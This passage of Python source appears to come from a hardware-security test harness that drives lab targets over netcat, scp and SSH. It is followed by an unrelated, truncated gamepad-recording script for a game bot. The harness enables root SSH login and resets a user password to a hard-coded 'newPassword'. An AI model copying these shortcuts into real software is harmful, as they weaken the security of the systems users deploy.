termination].",exc=exc) scpOutFile.close() time.sleep(5) self.keyboardInterrupt (exitOnError=True) else: #send the file through netcat if not toTarget: return returnFalse("sendFile: sending a file FROM the target requires an SSH connection", noRetries=True) if (self.osImage=='debian'): listenOnTarget = threading.Thread(target=self.runCommand, kwargs=dict(command=f"nc -lp {self.portTarget} > {targetPath}",timeout=timeout,exitOnError=False)) elif (self.osImage=='FreeBSD'): listenOnTarget = threading.Thread(target=self.runCommand, kwargs=dict(command=f"nc -I 1024 -l {self.portTarget} > {targetPath}",timeout=timeout,exitOnError=False)) listenOnTarget.daemon = True getSetting('trash').throwThread(listenOnTarget,f"nc listening for <{xFile}> on Target") sendFromHost = threading.Thread(target=subprocess.call, kwargs=dict(args=f"nc -w 1 {self.ipTarget} {self.portHost} <{hostPath}",shell=True)) sendFromHost.daemon = True getSetting('trash').throwThread(sendFromHost,f"nc sending <{pathToFile}/{xFile}> from host") listenOnTarget.start() time.sleep(5) sendFromHost.start() listenOnTarget.join(timeout=timeout+5) #arbitrarily set timeout #check sending if (sendFromHost.is_alive()): logging.warning(f"sendFile: Netcat sending from host is still hanging while sending <{xFile}> to target.\n") if (listenOnTarget.is_alive() or (not self.doesFileExist(xFile,timeout=timeout,exitOnError=False))): return returnFalse() #obtaining the checksum try: f = targetPath if not toTarget else hostPath shaSumRX = checksumTarget(targetPath) if toTarget else checksumHost(hostPath) except Exception as exc: return returnFalse (f"Failed to obtain the checksum of <{f}>.",noRetries=True,exc=exc) if (shaSumRX != shaSumTX): return returnFalse(f"sendFile: Checksum from <{xFile}> on target does not match.") self.resendAttempts = 0 #reset return True @decorate.debugWrap def doesFileExist (self,xFile,pathToFile='.',timeout=15,exitOnError=True): return self.runCommand(f"ls {pathToFile}/{xFile}",suppressErrors=True,expectedContents=xFile,erroneousContents=['ls:', 'cannot access', 'No such file or directory'],timeout=timeout,exitOnError=exitOnError)[0] @decorate.debugWrap def sendTar(self,timeout=30): #send tarball to target printAndLog (f"{self.targetIdInfo}sendTar: Sending files...",doPrint=(not self.targetId)) #---send the archive if ((self.binarySource in ['GFE', 'SRI-Cambridge']) and (self.osImage=='FreeBSD')): if (self.userCreated): self.switchUser() #this is assuming it was on root self.sendFile (getSetting('buildDir',targetId=self.targetId),self.tarballName,timeout=timeout,forceScp=True) if (self.userCreated): self.switchUser() self.runCommand(f"mv /home/{self.userName}/{self.tarballName} /root/") else: self.sendFile (getSetting('buildDir',targetId=self.targetId),self.tarballName,timeout=timeout) #---untar if (self.osImage=='debian'): untarProcess = None if (self.processor!='bluespec_p3') else self.ttyProcess self.runCommand(f"tar xvf {getSetting('tarballName')} --warning=no-timestamp", erroneousContents=['gzip:','Error','tar:','Segmentation fault'],timeout=timeout, process=untarProcess) elif (self.osImage=='FreeBSD'): self.runCommand(f"tar xvf {self.tarballName} -m",erroneousContents=['gzip:','Error','tar:'],timeout=timeout) self.runCommand(f"rm {self.tarballName}",timeout=timeout) #to save space printAndLog (f"{self.targetIdInfo}sendTar: Sending successful!",doPrint=(not self.targetId)) @decorate.debugWrap @decorate.timeWrap def runFettApps (self,sendFiles=False,timeout=60): #executes the app printAndLog ("runFettApps: Starting the application stack...") if (sendFiles): #send any needed files to target if (self.procLevel=='p3'): timeout *= 4 self.sendTar(timeout=timeout) # assign modules if (self.osImage=='FreeRTOS'): self.appModules = [freertos] elif (self.osImage in ['debian', 'FreeBSD']): self.appModules = [ssh, webserver, database, voting] if (self.binarySource=='MIT'): #Disable nginx self.appModules.remove(webserver) self.appModules.remove(voting) #hosted by the webserver else: self.terminateAndExit(f"<runFettApps> is not implemented for <{self.osImage}>.",exitCode=EXIT.Implementation) # The appLog will be the file object flying around for logging into app.out appLog = ftOpenFile(os.path.join(getSetting('workDir'),'app.out'), 'a') appLog.write('-'*20 + "<BESSPIN-TOOL-SUITE-OUT>" + '-'*20 + '\n\n') setSetting("appLog",appLog) if (self.binarySource=='SRI-Cambridge'): setSetting('sqliteBin','/fett/bin/sqlite3') else: setSetting('sqliteBin','/usr/bin/sqlite') # Install for appModule in self.appModules: appModule.install(self) appLog.flush() # Test for appModule in self.appModules: appModule.deploymentTest(self) appLog.flush() appLog.close() logging.info (f"runFettApps: The application stack is deployed successfully!\n") return @decorate.debugWrap @decorate.timeWrap def collectLogs (self): if (self.osImage not in ['debian', 'FreeBSD']): printAndLog(f"No logs to be collected from <{self.osImage}>.",doPrint=False) return # Collect all logs into one directory logsPathName = 'logsFromTarget' logsPathOnTarget = f'/root/{logsPathName}' self.runCommand(f"mkdir {logsPathName}") # Apps logs for appModule in self.appModules: if hasattr(appModule, "dumpLogs"): appModule.dumpLogs(self, logsPathOnTarget) printAndLog (f"collectLogs: Collected <{appModule.__name__.split('.')[-1]}> logs.") else: printAndLog (f"collectLogs: nothing to do for module <{appModule.__name__.split('.')[-1]}>.",doPrint=False) # syslogs self.runCommand (f"cp /var/log/* {logsPathOnTarget}") #On debian, this returns `cp: ommitted directories` self.runCommand(f"dmesg > {os.path.join(logsPathOnTarget,'dmesg.txt')}") printAndLog (f"collectLogs: Collected syslogs.") # Create the tarball logsTarball = 'logsFromTarget.tar' self.runCommand(f"tar cvf {logsTarball} {logsPathName}",erroneousContents=['gzip:','Error','tar:']) self.runCommand(f"mv {logsTarball} /home/{self.userName}/{logsTarball}") self.runCommand(f"chown {self.userName}:{self.userName} /home/{self.userName}/{logsTarball}",erroneousContents=['chown:']) # Maybe the researcher has changed the password for some reason self.userPassword = 'newPassword' salt = crypt.mksalt() newHash = crypt.crypt(self.userPassword, salt) if (self.osImage=='debian'): self.runCommand(f"usermod -p \'{newHash}\' {self.userName}") elif (self.osImage=='FreeBSD'): self.runCommand (f"echo \'{newHash}\' | pw usermod {self.userName} -H 0",erroneousContents="pw:") # send the tarball to the artifacts directory using non-root SCP self.switchUser () #login as user artifactPath = getSetting('extraArtifactsPath') if(self.sendFile( artifactPath, logsTarball, targetPathToFile=f'/home/{self.userName}', forceScp=True, toTarget=False, exitOnError=False )): printAndLog(f"collectLogs: Received logs from target.") # untar the tarball to be more friendly tarballPathOnHost = os.path.join(artifactPath,logsTarball) shellCommand (['tar','xvf',tarballPathOnHost,'-C',artifactPath]) #check is True not to delete it by mistake shellCommand (['rm',tarballPathOnHost]) else: errorAndLog(f"collectLogs: Failed to receive logs from target.") self.switchUser () #back to root return @decorate.debugWrap def keyboardInterrupt ( self, exitOnError=True, timeout=15, retryCount=3, process=None, endsWith=None, sendToNonUnix=False, respondEndsWith=None): """ " keyboardInterrupt: Attemtps to ^C and recover. " ARGUMENTS: " ---------- " exitOnError: Boolean. Whether to return or terminateAndExit in case of error. " timeout: how long to wait for endsWith before timing out. " retryCount: How many retries/(^Cs) before error. " process: runCommand with a different process than self.process " endsWith: String/regex or list of strings/regex. The expected returns when either is received from target. " sendToNonUnix: Boolean. If enabled, the command is sent to non-Unix targets as well. " respondEndsWith: A tuple: (A special endsWith, what to respond if encountered it) " -------- " RETURNS: " A string containing all text returned back from the target during the resolving of the interrupt. """ process = self.process if process is None else process if (process is None): self.terminateAndExit(f"{self.targetIdInfo}<keyboardInterrupt> is called, but the process is <None>.", exitCode=EXIT.Run) if (endsWith is None): endsWith = [self.getDefaultEndWith()] elif (isinstance(endsWith,str)): endsWith = [endsWith] if (respondEndsWith is not None): try: specialEndsWith, specialResponse = respondEndsWith except Exception as exc: self.terminateAndExit(f"{self.targetIdInfo}keyboardInterrupt: Called with illegal <respondEndsWith> argument.", overrideShutdown=True,overrideConsole=True,exitCode=EXIT.Dev_Bug) endsWith = [specialEndsWith] + endsWith if (self.terminateTargetStarted and (process == self.process)): return '' if (self.keyboardInterruptTriggered): #to break any infinite loop self.terminateAndExit(f"{self.targetIdInfo}keyboardInterrupt: interrupting is not resolving properly", overrideShutdown=True,overrideConsole=True,exitCode=EXIT.Run) else: self.keyboardInterruptTriggered = True if ((not isEnabled('isUnix',targetId=self.targetId)) and (process == self.process)): self.terminateAndExit(f"{self.targetIdInfo}<keyboardInterrupt> is not implemented for <{self.osImage}>.", exitCode=EXIT.Implementation) doTimeout = True retryIdx = 0 while doTimeout and retryIdx < retryCount: if retryIdx > 0: warnAndLog(f"{self.targetIdInfo}keyboardInterrupt: keyboard interrupt failed! Trying again ({retryIdx}/{retryCount})...") retCommand = self.runCommand("\x03",endsWith=endsWith,exitOnError=False,timeout=timeout, issueInterrupt=False,suppressErrors=True,process=process,sendToNonUnix=sendToNonUnix) textBack = retCommand[1] doTimeout = retCommand[2] retryIdx += 1 if ((respondEndsWith is not None) and (retCommand[3]==0)): #Got the special response endsWith.remove(specialEndsWith) textBack += self.runCommand(specialResponse,endsWith=endsWith,exitOnError=exitOnError,timeout=timeout, process=process,suppressErrors=True,sendToNonUnix=sendToNonUnix)[1] elif ((not retCommand[0]) or (retCommand[2])): retCommand2 = self.runCommand(" ",endsWith=endsWith,exitOnError=exitOnError,timeout=timeout, process=process,suppressErrors=True,sendToNonUnix=sendToNonUnix) textBack += retCommand2[1] if ((respondEndsWith is not None) and (retCommand2[3]==0)): #Got the special response endsWith.remove(specialEndsWith) textBack += self.runCommand(specialResponse,endsWith=endsWith[1:],exitOnError=exitOnError,timeout=timeout, process=process,suppressErrors=True,sendToNonUnix=sendToNonUnix)[1] #See if the order is correct if (process): breakRetries = False for i in range(retryIdx + 2): readAfter = self.readFromTarget(readAfter=True,process=process) for xEndsWith in endsWith: if ((xEndsWith in readAfter) or (re.search(xEndsWith,readAfter) is not None)): #Accommodate for regex matching try: process.expect(xEndsWith,timeout=1) except Exception as exc: warnAndLog(f"{self.targetIdInfo}keyboardInterrupt: <{xEndsWith}> was in process.after, " f"but could not pexpect.expect it. Will continue anyway.",doPrint=False,exc=exc) breakRetries = True textBack += readAfter if (breakRetries): break self.keyboardInterruptTriggered = False #Safe to be called again return textBack @decorate.debugWrap def ensureCrngIsUp (self): if (self.osImage!='debian'): self.terminateAndExit(f"<ensureCrngIsUp> is not implemented for <{self.osImage}>.",exitCode=EXIT.Implementation) isCrngUp = False for iAttempt in range(5): retCommand = self.runCommand("dmesg | grep random",expectedContents="crng init done",suppressErrors=True,exitOnError=False,timeout=30) isCrngUp = retCommand[0] retText = retCommand[1] if (isCrngUp): logging.info(f"ensureCrngIsUp: CRNG is properly initialized.\n") break retText += self.runCommand("./addEntropyDebian.riscv",erroneousContents=["bash:","<INVALID>"])[1] if ("crng init done" in retText): isCrngUp = True logging.info(f"ensureCrngIsUp: CRNG is properly initialized.\n") break if (not isCrngUp): self.terminateAndExit(f"ensureCrngIsUp: CRNG was not initialized.",exitCode=EXIT.Run) @decorate.debugWrap def checkFallToTty (self,fnName,process=None): process = self.process if process is None else process if self.process is None or process.fileno() != self.process.fileno(): logging.debug(f"checkFallToTty: returning due to custom process") return if ((not self.process) and self.isSshConn): warnAndLog(f"{fnName}: called with sshConnection, but connection is unreachable. Falling back to main tty.",doPrint=False) self.killSshConn() if (not self.process): #Note that this condition cannot be merged with the above one, because killSshConn updates self.process self.terminateAndExit(f"{fnName}: Failed to communicate with target.",overrideShutdown=True,exitCode=EXIT.Run) logging.debug(f"{fnName}: isSshConn = {self.isSshConn}") return @decorate.debugWrap def readFromTarget (self,endsWith=None,readAfter=False,process=None): process = self.process if process is None else process self.checkFallToTty ("readFromTarget", process=process) try: if (readAfter): fetchedBytes = process.after else: #default fetchedBytes = process.before try: if (fetchedBytes == pexpect.TIMEOUT): textBack = '\n<TIMEOUT>\n' elif (fetchedBytes == pexpect.EOF): textBack = '\n<EOF>\n' else: textBack = str(fetchedBytes,'utf-8') except UnicodeDecodeError: textBack = charByCharEncoding(fetchedBytes) warnAndLog (f"{self.targetIdInfo}Unrecognized character while reading from target.",doPrint=False) except Exception as exc: warnAndLog (f"{self.targetIdInfo}Failed to read from target.",doPrint=False,exc=exc) return '' logging.debug(f"{self.targetIdInfo}readFromTarget: <endsWith={endsWith}>") logging.debug(f"{self.targetIdInfo}textBack:\n{textBack}{endsWith}") return textBack @decorate.debugWrap def sendToTarget (self,command,exitOnError=True,process=None): process = self.process if process is None else process self.checkFallToTty ("sendToTarget", process=process) logging.debug(f"{self.targetIdInfo}sendToTarget: sending <{command}>") try: process.sendline(command) except Exception as exc: if (exitOnError): self.terminateAndExit(f"{self.targetIdInfo}sendToTarget: Failed to send <{command}> to {self.target}.",exc=exc,exitCode=EXIT.Run) else: warnAndLog (f"{self.targetIdInfo}sendToTarget: Failed to send <{command}> to {self.target}.",exc=exc,doPrint=False) return @decorate.debugWrap @decorate.timeWrap def expectFromTarget (self,endsWith,command,exitOnError=True,timeout=15,overrideShutdown=False, issueInterrupt=True,process=None,suppressWarnings=False,sshRetry=True): def warningThread(msg, waitingTime, stopEvent, suppressWarnings): """thread will wait on an event, and display warning if not set by waiting time""" dt = 0.1 dt = waitingTime / 10.0 if dt > waitingTime else dt ct = 0.0 while ct < waitingTime: time.sleep(dt) if stopEvent.is_set(): return ct += dt warnAndLog(msg,doPrint=not suppressWarnings) process = self.process if process is None else process # prepare thread to give warning message if the expect is near timing out stopEvent = threading.Event() warningTime = 0.8 * timeout warningMsg = threading.Thread(target=warningThread, args=(f"{self.targetIdInfo}expectFromTarget: command <{command}> is near timeout ({timeout} s)", warningTime, stopEvent,suppressWarnings)) warningMsg.daemon = True getSetting('trash').throwThread(warningMsg, "warning message for expectFromTarget") warningMsg.start() self.checkFallToTty ("expectFromTarget",process=process) logging.debug(f"{self.targetIdInfo}expectFromTarget: <command={command}>, <endsWith={endsWith}>") textBack = '' try: retExpect = process.expect(endsWith,timeout=timeout) if ((endsWith == pexpect.EOF) or isinstance(endsWith,str)): #only one string or EOF textBack += self.readFromTarget(endsWith=endsWith,process=process) else: #It is a list textBack += self.readFromTarget(endsWith=endsWith[retExpect],process=process) except pexpect.TIMEOUT: if (exitOnError): self.terminateAndExit(f"{self.targetIdInfo}expectFromTarget: {self.target.capitalize()} timed out <{timeout} seconds> while executing <{command}>.",exitCode=EXIT.Run,overrideShutdown=overrideShutdown) elif (self.osImage!='FreeRTOS'): warnAndLog(f"{self.targetIdInfo}expectFromTarget: <TIMEOUT>: {timeout} seconds while executing <{command}>.",doPrint=False) textBack += self.keyboardInterrupt (exitOnError=True, process=process) if issueInterrupt else "" return [textBack, True, -1] except Exception as exc: if ((self.processor=='bluespec_p3') and (exc.__class__ == pexpect.EOF) and (sshRetry) and (self.isSshConn)): warnAndLog(f"{self.targetIdInfo}SSH connection was unexpectedly dropped. Trying to reconnect...") self.openSshConn(userName='root' if self.isCurrentUserRoot else self.userName) self.sendToTarget(" ") return self.expectFromTarget (endsWith,command,exitOnError=exitOnError,timeout=timeout, overrideShutdown=overrideShutdown,issueInterrupt=issueInterrupt,process=None, suppressWarnings=suppressWarnings,sshRetry=False) self.terminateAndExit(f"{self.targetIdInfo}expectFromTarget: Unexpected output from target while executing {command}.",exc=exc,exitCode=EXIT.Run,overrideShutdown=overrideShutdown) # tell warning message thread that the expect is finished stopEvent.set() if (isinstance(endsWith,str)): #only one string textBack += endsWith elif ((endsWith not in [pexpect.EOF, pexpect.TIMEOUT]) and isinstance(endsWith[retExpect],str)): #list textBack += endsWith[retExpect] return [textBack, False, retExpect] @decorate.debugWrap @decorate.timeWrap def terminateTarget (self): self.terminateTargetStarted = True poweroffCommand = {'debian' : 'poweroff -f', 'FreeBSD' : 'halt -p', 'busybox' : 'poweroff -f'} if (self.osImage in poweroffCommand): if (self.isSshConn and (not self.onlySsh)): #only shutdown on tty if possible self.closeSshConn() if (self.binarySource=='MIT'): endsWith = 'Power down' elif ((self.target == 'vcu118') and (not self.isSshConn)): #On vcu118, the uart serial connection (through fdpexpect) won't be killed endsWith = 'Power off' else: endsWith = pexpect.EOF timeout = 120 if (self.processor=='bluespec_p3') else 60 self.runCommand(poweroffCommand[self.osImage],endsWith=endsWith,suppressErrors=True) if (self.onlySsh): self.closeSshConn() elif (self.osImage=='FreeRTOS'): if (getSetting('mode') in ['fettTest', 'fettProduction']): freertos.terminateAppStack(self) else: self.terminateAndExit(f"terminateTarget: not implemented for <{self.osImage}> on <{self.target}>.",exitCode=EXIT.Implementation) self.tearDown() return @decorate.debugWrap @decorate.timeWrap def tearDown(self): if (self.targetTearDownCalled): #Do not execute twice return self.targetTearDownCalled = True self.targetTearDown() try: self.fTtyOut.close() except Exception as exc: warnAndLog("terminateTarget: Failed to close the <tty> out file.",doPrint=False,exc=exc) return @decorate.debugWrap def clearHostKey (self): ipUpdateECDSA = self.ipTarget if (not self.sshHostPort) else f"[{self.ipTarget}]:{self.sshHostPort}" self.fSshOut = ftOpenFile(os.path.join(getSetting('workDir'),f'ssh{self.targetSuffix}.out'),'ab') try: subprocess.check_call (['ssh-keygen', '-R', ipUpdateECDSA],stdout=self.fSshOut,stderr=self.fSshOut) except Exception as exc: warnAndLog(f"openSshConn: Failed to clear the target's ECDSA key. Will continue anyway.",exc=exc,doPrint=False) self.sshECDSAkeyWasUpdated = True self.fSshOut.close() @decorate.debugWrap @decorate.timeWrap def openSshConn (self,userName='root',endsWith=None,timeout=60,specialTest=False): def returnFail (message,exc=None,returnSpecial=False): self.killSshConn() if (returnSpecial): return 'BLOCKED_IP' warnAndLog (message,doPrint=False,exc=exc) extraMsg = ' Trying again...' if (self.sshRetries < self.sshLimitRetries-1) else '' warnAndLog(f"openSshConn: Failed to open an SSH connection for <{userName}>.{extraMsg}",doPrint=(not specialTest)) self.sshRetries += 1 return self.openSshConn (userName=userName, endsWith=endsWith, timeout=timeout, specialTest=specialTest) if (self.osImage not in ['FreeBSD','debian']): self.terminateAndExit(f"<openSshConn> is not implemented for <{self.osImage}>.",exitCode=EXIT.Dev_Bug) if (self.sshRetries >= self.sshLimitRetries): #to protect it from excessive attempts return False if (userName == 'root'): self.enableSshOnRoot() portPart = '' if (not self.sshHostPort) else f" -p {self.sshHostPort}" sshCommand = f"env -u SSH_AUTH_SOCK ssh{portPart} {userName}@{self.ipTarget}" sshPassword = self.rootPassword if (userName=='root') else self.userPassword #Need to clear the ECDSA key first in case it is not the first time if (not self.sshECDSAkeyWasUpdated): self.clearHostKey() self.killSshConn() self.fSshOut = ftOpenFile(os.path.join(getSetting('workDir'),f'ssh{self.targetSuffix}.out'),'ab') try: self.sshProcess = pexpect.spawn(sshCommand,logfile=self.fSshOut,timeout=timeout) except Exception as exc: return returnFail(f"openSshConn: Failed to spawn an Ssh connection.",exc=exc) self.genStdinEntropy(endsWith=self.getAllEndsWith()) self.isSshConn = True self.process = self.sshProcess passwordPrompt = [f"Password for {userName}@[\w\-\.]+\:", f"{userName}@[\w\-\.]+\'s password\:"] blockedIpResponse = ["Connection closed by remote host", "Connection reset by peer", "Permission denied (publickey,keyboard-interactive)."] retExpect = self.expectFromTarget(passwordPrompt + blockedIpResponse + ['\)\?',pexpect.EOF],"openSshConn", timeout=timeout,exitOnError=False,issueInterrupt=False) if (retExpect[1]): #Failed return returnFail(f"openSshConn: Spawning the ssh process timed out.") elif (retExpect[2]==5): # asking for yes/no for new host retYes = self.runCommand("yes",endsWith=passwordPrompt+blockedIpResponse+[pexpect.EOF], timeout=timeout,exitOnError=False,issueInterrupt=False) if (retYes[3] not in [0,1]): #No password prompt return returnFail(f"openSshConn: Unexpected outcome when responding <yes> to the ssh process.", returnSpecial=(specialTest and (retYes[3] in [2,3,4,5]))) elif (retExpect[2] in [2,3,4,6]): #the ip was blocked or connection refused return returnFail(f"openSshConn: Unexpected response when spawning the ssh process.",returnSpecial=specialTest) retPassword = self.runCommand(sshPassword,endsWith=endsWith,timeout=timeout, exitOnError=False,issueInterrupt=False) if (not retPassword[0]): return returnFail(f"openSshConn: Failed to login to the SSH connection.") self.sshRetries = 0 #reset the retries return True @decorate.debugWrap def killSshConn (self): #Only for FreeBSD and Debian if (self.sshProcess is not None): try: self.sshProcess.terminate(force=True) self.sshProcess = None except Exception as exc: warnAndLog(f"killSshConn: Failed to terminate the sshProcess.\n",exc=exc,doPrint=False) self.isSshConn = False self.process = self.ttyProcess @decorate.debugWrap def closeSshConn (self, timeout=60): if (self.osImage not in ['FreeBSD','debian']): self.terminateAndExit(f"<closeSshConn> is not implemented for <{self.osImage}>.",exitCode=EXIT.Dev_Bug) if (self.isSshConn and (self.sshProcess is not None)): self.runCommand("exit", endsWith=pexpect.EOF, timeout=timeout, suppressErrors=True, exitOnError=False, issueInterrupt=False) try: self.fSshOut.close() except Exception as exc: warnAndLog(f"closeSshConn: Failed to close the ssh{self.targetSuffix}.out file.",doPrint=False) self.killSshConn() return True @decorate.debugWrap def pingTarget (self,exitOnError=True,pingAttempts=3,printSuccess=True): #pinging the target to check everything is ok pingOut = ftOpenFile(os.path.join(getSetting('workDir'),f'ping{self.targetSuffix}.out'),'a') wasPingSuccessful = False for iPing in range(pingAttempts): try: subprocess.check_call(['ping', '-c', '1', '-W', '5', self.ipTarget],stdout=pingOut,stderr=pingOut) wasPingSuccessful = True break except Exception as exc: if (iPing < pingAttempts - 1): errorAndLog (f"Failed to ping the target at IP address <{self.ipTarget}>. Trying again ({iPing+2}/{pingAttempts})...",doPrint=False,exc=exc) time.sleep(10) else: pingOut.close() if (exitOnError): self.terminateAndExit(f"Failed to ping the target at IP address <{self.ipTarget}>.",exc=exc,exitCode=EXIT.Network) else: errorAndLog (f"Failed to ping the target at IP address <{self.ipTarget}>.",doPrint=False,exc=exc) return False pingOut.close() doPrintSuccess = printSuccess and (not (isEqSetting('mode','evaluateSecurityTests') and (self.osImage=='FreeRTOS'))) printAndLog (f"{self.targetIdInfo}IP address is set to be <{self.ipTarget}>. Pinging successfull!", doPrint=doPrintSuccess) return True @decorate.debugWrap def genStdinEntropy (self,endsWith=None): if ((not self.hasHardwareRNG()) and (not self.onlySsh)): lenText = 240 # Please do not use a larger string. there might be a UART buffer issue on firesim, should be resolved soon alphabet = string.ascii_letters + string.digits + ' ' randText = ''.join(random.choice(alphabet) for i in range(lenText)) self.runCommand(f"echo \"{randText}\"",endsWith=endsWith,timeout=60,exitOnError=False) def hasHardwareRNG (self): return ( ((self.target=='awsf1') and (self.pvAWS in ['firesim', 'connectal'])) or ((self.target=='qemu') and (self.osImage=='debian')) ) def hasGdbAccess (self): return ( (self.target=='vcu118') or ((self.target=='awsf1') and (self.pvAWS in ['firesim', 'connectal'])) ) @decorate.debugWrap @decorate.timeWrap def getGdbOutput(self): message = f"getGdbOutput is not implemented for <{self.targetInfo}>" warnAndLog(message,doPrint=False) return message @decorate.debugWrap def startGdbDebug(self): warnAndLog(f"<gdbDebug> is not implemented for <{self.targetInfo}>.") return @decorate.debugWrap def endGdbDebug(self): warnAndLog(f"<gdbDebug> is not implemented for <{self.targetInfo}>.") return @decorate.debugWrap @decorate.timeWrap def enableSshOnRoot (self): if (self.isSshRootEnabled): return #nothing to do switchUsers = not self.isCurrentUserRoot if (switchUsers): self.switchUser() #has to be executed on root # sshd_config location if (self.binarySource == 'SRI-Cambridge'): sshdConfigPath = "/fett/etc/sshd_config" else: #default sshdConfigPath = "/etc/ssh/sshd_config" self.runCommand (f"echo \"PermitRootLogin yes\" >> {sshdConfigPath}") self.retartSshService() self.isSshRootEnabled = True if (switchUsers): self.switchUser() #switch back if ((self.processor == 'bluespec_p3') or ((self.target == 'awsf1') and (self.osImage == 'FreeBSD'))): #needs time to take effect time.sleep(15) @decorate.debugWrap @decorate.timeWrap def retartSshService (self): if (not self.isCurrentUserRoot): self.switchUser() #has to be executed on root if (self.osImage=='debian'): self.runCommand ("service ssh restart") if (self.osImage=='FreeBSD'): if (self.binarySource=='SRI-Cambridge'): self.runCommand("service fett_sshd restart") elif (self.target in ['awsf1','qemu']): self.runCommand("pkill -f /usr/sbin/sshd") self.runCommand("/usr/sbin/sshd") else: self.runCommand("/etc/rc.d/sshd restart",timeout=120 if (self.procLevel=='p3') else 60) @decorate.debugWrap @decorate.timeWrap def findPort(self,portUse='unspecified'): #this seems wasteful, but it ensures thread-safe checks without using the networkLock for iPort in range(self.portsBegin,self.portsEnd+1,self.portsStep): if (checkPort(iPort)): self.portsBegin = iPort + self.portsStep return iPort self.terminateAndExit(f"{self.targetIdInfo}findPort: Failed to find an unused port" f" in the range of <{self.portsBegin}:{self.portsEnd}> for <{portUse}>.", exitCode=EXIT.Network) # END OF CLASS commonTarget @decorate.debugWrap def checkPort (portNum, host=''): with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as iSock: try: iSock.bind((host, portNum)) return True except OSError as error: if (error.errno is not errno.EADDRINUSE): errorAndLog (f"checkPort: Encountered OS Error #{error} while checking port #{portNum}.",doPrint=False) else: #for readability pass #used port except Exception as exc: errorAndLog (f"checkPort: Encountered a non recognized error while checking port #{portNum}.",exc=exc,doPrint=False) return False @decorate.debugWrap def showElapsedTime (trash,estimatedTime=60,stdout=sys.stdout): def showTime(stopThread): startTime = time.time() minutesEst, secondsEst = divmod(estimatedTime, 60) estimatedPrefix = "Estimated ~{:0>2}:{:0>2} ".format(int(minutesEst),int(secondsEst)) if (isEqSetting('besspinEntrypoint','devHost')): showTimePrefix = f"{estimatedPrefix}----- Elapsed: " else: stdout.write(f"{estimatedPrefix}\n") while (not stopThread.is_set()): minutes, seconds = divmod(time.time() - startTime, 60) if (isEqSetting('besspinEntrypoint','devHost')): stdout.write(showTimePrefix + "{:0>2}:{:0>2}\r".format(int(minutes),int(seconds))) stdout.flush () time.sleep(0.25) if (isEqSetting('besspinEntrypoint','devHost')): stdout.write(' ' * (len(showTimePrefix)+5) + '\r') completedMsg = "Estimated ~{:0>2}:{:0>2} ----- Completed in {:0>2}:{:0>2}\n".format(int(minutesEst),int(secondsEst),int(minutes),int(seconds)) stdout.write(completedMsg) stdout.flush() logging.info(completedMsg) stopTimeTrack = threading.Event() runTimeTrack = threading.Thread(target=showTime, kwargs=dict(stopThread=stopTimeTrack)) runTimeTrack.daemon = True trash.throwThread(runTimeTrack,"Showing time thread") stopTimeTrack.clear() runTimeTrack.start() return stopTimeTrack @decorate.debugWrap def charByCharEncoding (inBytes): if (not isinstance(inBytes, Iterable)): return '' textBack = '' for xByte in inBytes: try: xChar = chr(xByte) except UnicodeDecodeError: xChar = '<!>' textBack += xChar return textBack @decorate.debugWrap def getAddrOfAdaptor (ethAdaptor,addrType,exitIfNoAddr=True): def noAddrFound(errMessage): if (exitIfNoAddr): logAndExit(f"getAddrOfAdaptor: Failed to {errMessage}. Please check the network configuration.",exitCode=EXIT.Network) else: printAndLog(f"getAddrOfAdaptor: Failed to {errMessage}.",doPrint=False) return 'NotAnAddress' if (addrType == 'MAC'): family = psutil.AF_LINK elif (addrType == 'IP'): family = socket.AF_INET else: logAndExit (f"getAddrOfAdaptor: Unrecognized address type <{addrType}> is up.",exitCode=EXIT.Dev_Bug) if (ethAdaptor not in psutil.net_if_addrs()): return noAddrFound(f"find the adaptor <{ethAdaptor}>") for addr in psutil.net_if_addrs()[ethAdaptor]: if (addr.family == family): printAndLog(f"getAddrOfAdaptor: <{addrType} address> of <{ethAdaptor}> = <{addr.address}>",doPrint=False) return addr.address return noAddrFound(f"get the <{addrType} address> of <{ethAdaptor}>")
utils.py
""" Author: Norio Kosaka ==== joystick input ==== x = self.JoystickX y = self.JoystickY forward = self.A jump = self.RightBumper use_item = self.C_left ==== Joystick output vector ==== [x, y, forward, jump, use_item] """ from PIL import ImageTk, Image from inputs import get_gamepad from skimage.transform import resize from skimage.io import imread import numpy as np import mss, time, math, threading, sys, argparse, os, collections import warnings warnings.filterwarnings("ignore") # ====== Global variables definitions ====== # window position SRC_W = 640 SRC_H = 480 SRC_D = 3 # joystick related variables OFFSET_X = 0 OFFSET_Y = 0 MAX_JOY_VAL_N64 = math.pow(2,8) MAX_JOY_VAL_PS4 = math.pow(2,15) # image sizes of input X IMG_W = 200 IMG_H = 66 IMG_D = 3 # file location OUTPUTDIR = "./temp/" INPUT_DATA_CSV = "./temp/data.csv" # skip frame rate SKIP_FRAME = 2 # ====== Class Definition ====== class Data_bot(): """ This module has the funtionality of taking screenshot and recording the inputs from the controller """ def __init__(self, record_verbose=1, controller_type="PS4"): self.record_verbose = record_verbose self.controller_type = controller_type self._t = 0 self.num_episode = 0 self.screen_capture = mss.mss() self.outfile = open(INPUT_DATA_CSV, 'a') self.JoystickX = 0 self.JoystickY = 0 self.A = 0 self.RightBumper = 0 self.C_left = 0 self._monitor_thread = threading.Thread(target=self._monitor_controller, args=()) self._monitor_thread.daemon = True self._monitor_thread.start() self._img = collections.deque(maxlen=2) self.X = list() self.y = list() def _monitor_controller(self): """ Using threading, a spawned process keeps maintaining the state of this class Then, whenever read_data is called, we can get the current information(capture and inputs from the controller) """ if self.controller_type == "N64": while True: events = get_gamepad() for event in events: # remove noise if ((event.code == 'ABS_Z') and (event.state in [130,131,132,133,134,135,136,137,138,139])) or (event.code == 'SYN_REPORT'): pass else: # joystick: right(237) or left(30) if event.code == 'ABS_Z': self.JoystickX = event.state / MAX_JOY_VAL_N64 # normalise data between 0 and 1 elif event.code == 'ABS_Y': self.JoystickY = event.state / MAX_JOY_VAL_N64 # normalise data between 0 and 1 elif (event.code == 'MSC_SCAN') and (event.state == 589831): self.A = 1 elif (event.code == 'MSC_SCAN') and (event.state == 589830): self.RightBumper = 1 elif (event.code == 'MSC_SCAN') and (event.state == 589826): self.C_left = 1 elif self.controller_type == "PS4": while True: events = get_gamepad() for event in events: if event.code == 'ABS_X': self.JoystickX = event.state / MAX_JOY_VAL_PS4 # normalise data between 0 and 1 elif event.code == 'ABS_Y': self.JoystickY = event.state / MAX_JOY_VAL_PS4 # normalise data between 0 and 1 elif event.code == 'BTN_SOUTH': self.A = 1 elif event.code == 'BTN_TR': self.RightBumper = 1 elif event.code == 'BTN_EAST': self.C_left = 1 def _buffer_reset(self): """ After reading the data, we refresh the buffer """ self.JoystickX = 